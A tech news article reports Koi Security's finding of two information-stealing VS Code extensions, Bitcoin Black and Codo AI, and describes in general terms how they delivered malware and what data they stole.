Security researchers have uncovered two harmful extensions on Microsoft’s Visual Studio Code Marketplace that were found infecting developer systems with information stealing malware. These extensions were capable of taking screenshots, stealing login details, accessing crypto wallets, and hijacking browser sessions.
The malicious extensions were listed as Bitcoin Black and Codo AI and were published under the developer name BigBlack. One of them was disguised as a color theme, while the other posed as an AI assistant. At the time of discovery, Codo AI had fewer than 30 downloads, while Bitcoin Black showed only one installation.
According to findings shared by Koi Security, Bitcoin Black used a special activation setting marked with a “*” which allowed it to run during every action inside VS Code. This extension also had the ability to execute PowerShell commands, which is unnecessary for a theme and was considered a serious warning sign.
Earlier versions of Bitcoin Black relied on a PowerShell script that downloaded a password protected file, which could alert users due to a visible PowerShell window. In newer versions, the attackers switched to a batch script that quietly used curl to download harmful files while keeping the activity hidden from users.
Koi Security researcher Idan Dardikman explained that Codo AI did offer real code help using tools like ChatGPT or DeepSeek, but it also contained hidden malicious code. Both extensions delivered a clean version of the Lightshot screenshot tool along with a harmful DLL file. This DLL was loaded using a hijacking method that allowed the malware to run as runtime.exe.
The malware created folders inside the local app data directory under the name Evelyn to store stolen information. This included running processes, clipboard data, WiFi credentials, system details, screenshots, installed programs, and more.
To take over browser sessions, the malware launched Chrome and Edge in headless mode to capture stored cookies. It also targeted crypto wallets such as Phantom, Metamask, and Exodus, along with saved passwords and credentials.
The malicious file was detected by 29 out of 72 antivirus engines on Virus Total. Microsoft has been contacted regarding the issue, but no response was shared at the time of reporting. Developers are advised to install extensions only from trusted publishers to reduce security risks.
Also read: Viksit Workforce for a Viksit Bharat
Do Follow: The Mainstream formerly known as CIO News LinkedIn Account | The Mainstream formerly known as CIO News Facebook | The Mainstream formerly known as CIO News Youtube | The Mainstream formerly known as CIO News Twitter
About us:
The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology business and cyber landscape. Built on research-driven, thought leadership and original intellectual property, The Mainstream also curates summits & conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.
